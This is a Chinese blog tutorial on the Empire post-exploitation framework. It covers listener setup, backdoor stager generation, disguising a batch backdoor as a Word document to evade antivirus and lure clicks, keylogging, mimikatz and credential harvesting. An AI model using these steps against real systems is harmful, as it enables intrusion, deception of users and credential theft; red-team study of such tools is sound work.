Empire内网渗透工具简单使用

最新推荐文章于 2024-05-11 09:35:52 发布
最新推荐文章于 2024-05-11 09:35:52 发布
阅读量2k 收藏 11
点赞数
分类专栏: 内网渗透工具总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/116104022
版权

文章目录

工具介绍

Empire是一款强大的Powershell脚本利用框架,类似于MSF渗透利用框架,只不过它是由Powershell脚本组成的,无需Powershell环境,木马后门生成、内网扫描、漏洞探测、漏洞利用、提权等功能,功能强大是一款优秀的后渗透利用框架,是Windows内网渗透中的一件大杀器。

下载地址

https://github.com/EmpireProject/Empire.git

功能介绍

在这里插入图片描述

设置监听

其实与Metasploit一样都是开始需要设置一个监听,设置一个payload的木马,主机运行后门木马返回一个session。

Listeners
进入监听
在这里插入图片描述

uselisteners
选择监听方式

Dbx 
http_com
http_hop
meterpreter
redirector    
http
http_foreign
http_mapi
onedrive

在这里插入图片描述
选择http监听方式
在这里插入图片描述
Info一下看一下设置参数
在这里插入图片描述
设置一个监听“hack”

Set name hack  #设置监听名称
Set name x.x.x.x:xx  #设置本地监听IP和端口
Back返回上级
List已设置的监听

在这里插入图片描述
Delete 监听名 就能删除监听
在这里插入图片描述

生成木马后门

Empire与metasploit一样在设置晚监听参数后,需要生成一个木门后门文件,上传到目标机器上执行。
与metasploit同出可以设置不同的监听载荷和攻击载荷,Empire是多模块化的stager

**Usestager**
Usestager stager类型  #设置stager(payload)类型

multi/bash                
multi/launcher            
multi/macro               
multi/pyinstaller         
multi/war            	

#以上为通用型后门  

osx/applescript           
osx/application                            
osx/dylib
osx/ducky                 
osx/jar                   
osx/launcher              
osx/macho                 
osx/macro                
osx/pkg                   r       
osx/teensy                
osx/safari_launche

#以上为mac OS后门

windows/backdoorLnkMacro
windows/bunny
windows/csharp_exe
windows/dll
windows/ducky
windows/hta
windows/launcher_bat
windows/launcher_lnk
windows/launcher_sct
windows/launcher_vbs
windows/launcher_xml
windows/macro
windows/macroless_msword
windows/shellcode
windows/teensy

#以上为windows后门

在这里插入图片描述

下面以window、linux常用的几种木马文件示例

1、Windows launcher_bat批处理脚本木马

usestager windows/launcher_bat  #选择木马类型
info  #查看设置参数选项

在这里插入图片描述

set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher_bat

在这里插入图片描述
在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述
伪装一下.bat文件,由于容易被杀毒软件拦截,可以利用word office文件将.bat
选择“对象”-“由文件创建”-选择“由文件创建”-“显示图标”-“更改图标”。
在这里插入图片描述
当目标用户点击该.doc文件并执行时,成功上线。
在这里插入图片描述
在这里插入图片描述

2、Windows dll动态链接文件木马

usestager windows/dll  #选择木马类型
info  #查看设置参数选项

在这里插入图片描述

set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher.dll

在这里插入图片描述
将dll文件上传到目标主机,通过打开运行-输入“regsvr32+空格+dll所在目录+dll文件”,正常的话执行完dll可以上线的 ,但进程是有的。
在这里插入图片描述

3、Windows launcher_vbs 脚本木马

usestager windows/launcher_vbs  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置刚才监听的hack
execute  #执行生成文件launcher_vbs

在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述

4、Windows powershell payload脚本上线

usestager windows/launcher_bat  #选择木马类型
info  #查看设置参数选项
set Listener hack #设置一个监听
back #返回listenner
launcher powershell hack #生成一个以powershell为准的shellcode
将生成的payload复制到目标机上运行,返回一个agents

在这里插入图片描述
上传到目标主机上,执行返回一个agent,成功上线
在这里插入图片描述

5、Windows macro(office宏)木马

usestager windows/macro  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置刚才监听的hack
execute  #执行生成一个宏文件木马

在这里插入图片描述
在这里插入图片描述
编辑创建宏文件,选择“视图”-“宏”-“查看宏”

在这里插入图片描述
随便起一个宏的名字,选择.docx文档,弹出一个vb编辑对话框,将原有的vbs脚本替换成为macro文件的脚本。

在这里插入图片描述
在这里插入图片描述
复制完成后点击“保存”弹出对话框
在这里插入图片描述

选择“Word 97-2003”保存类型
在这里插入图片描述
点击“启用内容”成功上线
在这里插入图片描述

6、linux bash payload脚本上线

usestager multi/bash  #选择木马类型
info  #查看设置参数选项
set Listener hack  #设置一个监听
execute #生成一个以bash脚本为准的shellcode
将生成的payload复制到目标机上运行,返回一个agents

在这里插入图片描述
上传到目标主机上运行,执行返回一个agent,成功上线
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Agent上线

当设置完监听和木马后门生成后在目标主机执行完后门后就会上线一个agent,也就和metasploit返回的session一样,agents可以看到上线的主机,name那一列相当于metaspolit的session id一样,Username如果主机前面有小*就代表提权成功了。
在这里插入图片描述

Interact 切换agents

Interact sessionID 切换session

在这里插入图片描述

常用参数

Info可以看到目标受控机的agent信息

在这里插入图片描述
Sysinfo可以看到受控主机的系统信息
在这里插入图片描述
Searchmoudule 模块名,与metasploti同出都可以搜索相应模块
在这里插入图片描述
Usemoudle 模块名切换,切换相应模块
在这里插入图片描述
Shell 命令,shell后面是跟着相应主机命令操作
在这里插入图片描述
Upload 文件名,可以将文件上传到目标主机
在这里插入图片描述
在这里插入图片描述
Download 可以下载受控主机文件,将文件保存到
在这里插入图片描述
在这里插入图片描述
Sc 命令也可以截取主机屏幕
在这里插入图片描述

Jobs显示键盘记录的进程
Jobs kill 杀掉键盘记录进程

在Access.log下可以看到对操作的记录
在这里插入图片描述
键盘记录keylogger

Usemoudle collection/keylogger

在这里插入图片描述
当输入时就会有记录
在这里插入图片描述
在提权完成可以调用mimikatz
在这里插入图片描述
Creds命令可以查看获取到的密码
在这里插入图片描述
本章节就简单介绍了一下Empire的基本使用方式和常见命令,下一章节中会介绍使用Empire常见的扫描和提权的使用。

参考文献

https://github.com/EmpireProject/Empire
https://item.jd.com/12743210.html?cu=true&utm_source=www.dushu.com&utm_medium=tuiguang&utm_campaign=t_1000254658_&utm_term=8cd27199e5284c17b1ab686439ccbd0a
https://cloud.tencent.com/developer/article/1038501
bye_X
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Red Team之Empire渗透工具介绍和使用
afei001
04-26 964
Empire介绍     Empire是一个纯粹的PowerShell后开发代理建立在密码安全的通信和灵活的架构。使用灵活架构的附加组件进行加密安全通信。Empire可以在不需要PowerShell.exe的情况下执行PowerShell代理。它可以迅速地使用后利用的模块,这些模块涵盖了从键盘记录程序到mimikatz等各种各样的功能,以及适应性通信以逃避络检测,所有这些都包含在以可用性为中心...
渗透测试基础之帝国empire
m0_65369792的博客
05-19 290
一. ​Empire介绍 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内扫描等,使用能够躲避内检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 二.
我的内渗透-Empire基本操作
h1825819493的博客
06-18 112
Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。
推荐开源项目:Empire - 高级持续性威胁(APT)模拟与渗透测试工具
最新发布
gitblog_00059的博客
05-11 302
推荐开源项目:Empire - 高级持续性威胁(APT)模拟与渗透测试工具 项目地址:https://gitcode.com/EmpireProject/Empire 项目介绍 Empire是一个强大的后渗透框架,专为Windows和Linux/OS X环境设计。虽然该项目已不再维护,但它在安全研究和教育领域仍具有很高的参考价值。Empire将之前著名的PowerShell Empire和Pyth...
渗透神器Empire安装和简单使用
hl1293348082的专栏
04-09 1910
1. Empire简介 官介绍如下: Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable
Empire-GUI: 一款强大的渗透测试框架的图形界面工具
gitblog_00093的博客
04-17 860
Empire-GUI: 一款强大的渗透测试框架的图形界面工具 项目地址:https://gitcode.com/EmpireProject/Empire-GUI 项目简介 Empire-GUI 是一个基于 Empire 框架的交互式图形用户界面(GUI),它提供了一种更直观、更易用的方式来操作 Empire,这是一款流行的 PowerShell post-exploitation 工具。该项目的目...
渗透测试-提权工具
05-25
渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
这是一个关于内渗透的文档
09-14
这个是属于empire渗透的这么一篇文档,里面感觉还不错。挺干的吧,适合小白
#资源分享达人# 红蓝对抗之Windows内渗透.zip
08-03
7. **络监听与隐藏通信**:使用Wireshark、 Cain & Abel等工具进行嗅探,或利用Meterpreter、Empire等框架隐藏通信,避免被蓝队检测到。 8. **后门安装**:在目标系统上植入后门程序,确保即使在初始访问点被关闭...
empire框架2022最新版本
06-28
Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内扫描等,使用能够躲避内检测喝大部分安全防护工具的查杀,简单来...
白蚁安的渗透工具
04-25
2. **漏洞扫描**:在获取了基础信息后,渗透测试者会使用工具如OpenVAS、Nessus等进行漏洞扫描,查找可被利用的安全弱点。 3. **漏洞利用**:一旦找到可利用的漏洞,工具如Metasploit、Burp Suite可以帮助测试者...
Empire渗透神器
weixin_43749601的博客
03-23 764
安装 git命令下载 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装Empire cd Empire cd setup sudo ./install.sh 但是会出现报错 Traceback (most recent call last): File "./empire", line 13, in <module> from lib.common import empire, helpers
Empire(三)域内渗透
qq_56426046的博客
09-15 265
如果域内用户访问不了外部站,我们需要登录管理员账户对浏览器属性安全进行设置,设置可信任的站点并应用,这样用户的浏览器才能访问信任的站。
渗透的一些工具和平台汇总
梦想专栏
08-22 7092
渗透的一些工具和平台汇总 转载自:http://www.mottoin.com/95177.html 各位老司机在日常的渗透过程中,都会有自己趁手的工具集合,有开源的有私有的,不管什么样的工具组合,能够达到最佳的渗透效果就是好工具,老司机分享一点自己在内渗透中惯用的开源工具和平台。 渗透测试平台类 Metasploit:这个大家都不陌生了,集信息收集,预渗透渗透,后渗透,木马,...
探秘Empire:一个灵活的Powershell渗透测试框架
gitblog_00007的博客
04-09 291
探秘Empire:一个灵活的Powershell渗透测试框架 项目地址:https://gitcode.com/PowerShellEmpire/Empire Empire 是一款强大的开源Powershell渗透测试工具,旨在为红队操作和安全研究提供一个功能全面、模块化的平台。在本文中,我们将深入探讨Empire的原理、应用及其独特之处,帮助你更好地理解和利用这一工具。 项目简介 Empire是...
Empire使用
谢公子的博客
01-14 2155
目录 Empire Empire的安装 Empire使用 建立监听 生成木马 上线后的操作 派生MSF 信息收集 权限提升 横向渗透 后门 Empire Empire一款基于PowerShell的后渗透测试工具,它具有 从stager生成,提权到渗透维持的一系列的功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速...
Powershell Empire工具介绍和使用
菜鸟-宇的个人博客
10-03 274
Empire是一个利用漏洞后的框架,它包括一个纯PowerShell2.0 Windows代理和一个纯Python 2.6/2.7 Linux/OS X代理。它是之前的PowerShell帝国和Python EmPyre项目的合并。该框架提供密码学安全通信和灵活的架构。
Empire使用
carmi的博客
03-29 818
Empire使用Empire简单介绍 Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次...
帝国Empire
MGwhhyq的博客
05-19 670
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内扫描等,使用能够躲避内检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
windows内渗透
10-14
针对 Windows 内渗透,可以采取以下几种方式: 1. 嗅探络流量:使用工具如 Wireshark、Tcpdump 等,监听内中的流量,获取目标主机的 IP 地址、开放端口、通信协议等信息。 2. 暴力破解密码:使用工具如 Hydra、Medusa 等,对内中的主机进行暴力破解,获取管理员或其他高权限用户的密码。 3. 利用漏洞攻击:使用工具如 Metasploit、Empire 等,利用已知的漏洞攻击内中的主机,获取系统权限。 4. 社会工程学攻击:通过伪装成可信的身份,诱骗内用户提供敏感信息或执行恶意操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值